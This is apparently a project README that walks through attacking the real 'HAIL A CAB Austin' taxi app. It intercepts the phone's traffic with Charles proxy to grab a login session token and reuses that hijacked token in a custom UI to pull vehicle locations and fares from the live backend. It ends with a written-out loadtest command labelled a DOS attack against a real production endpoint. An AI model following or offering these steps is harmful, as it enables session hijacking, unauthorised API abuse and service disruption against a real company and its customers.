## Test Specs ##
* We tested in the below system.
```
IPhone 7
Mac Sierra
```
* Our UI code is also currently available in an AWS EC2 instance -- http://52.24.252.176:3000/

## Setup ##
* Connect the PC and the smart phone to the same network and make sure that the network is bridged i.e. peers in the network can talk to each other.
* Note the IP address of the PC.
### In PC ###
* Download and install charles proxy [here](https://www.charlesproxy.com/download/latest-release/).
* Start charles proxy.
* Download the UI code.
```text
git clone https://vadivel_selvaraj@bitbucket.org/vadivel_selvaraj/hacking-webservices.git
```
* Install npm.
```text
curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
sudo apt-get install -y nodejs
sudo npm install -g loadtest
```
* Install nodeJS modules to run the UI code.
```text
cd hacking-webservices/data-hack/UI
npm install
```
* Start the nodeJS server
```text
cd hacking-webservices/data-hack/UI
npm start
```

### In Phone ###
* Install `HAIL A CAB Austin` taxi app in iPhone or Android from App Store/Google Play store.
* Register an account.
* Setup PC as the proxy server for the smart phone so that we can monitor all requests.
    * In IPhone, navigate to Settings > WiFi > CONNECTED_NETWORK's info icon > HTTP Proxy.
    * Click on Manual tab and fill in Server, Port details with that of the PC's IP address and port 8888(default port for Charles proxy).

## Execution Steps ##
### Hijack session id ###
* Login to the `HAIL A CAB Austin` taxi app and search, pick a location. This should trigger some backend call.
* Now in the PC, find the URL 'iphone.houstonyellowcab.com' and click on it.
* Click on the Contents tab and then the 'Json Text' tab. Note the value of 'LoginSessionToken'.  

### Get number of taxis at any place in Austin ###
* Navigate to the UI in browser -- http://localhost:3000
* Paste the login session token found above in the 'Hijacked Session ID' field.
* In the left pane, select any place in the drop down and hit Submit.

### Get fare estimates between two places in Austin ### 
* In the right pane, select any place in the source, destination drop downs and hit Submit.

### DOS Attack ###
* Since this is a real webservice here, we tried doing only a limited number of calls.
```text
sudo loadtest -c 5 -n 1000 --rps 10 http://iphone.houstonyellowcab.com:8080/ServerBooker-Austin/BA/GHTG/api/CustomerApp/GetNearbyVehicles
```
  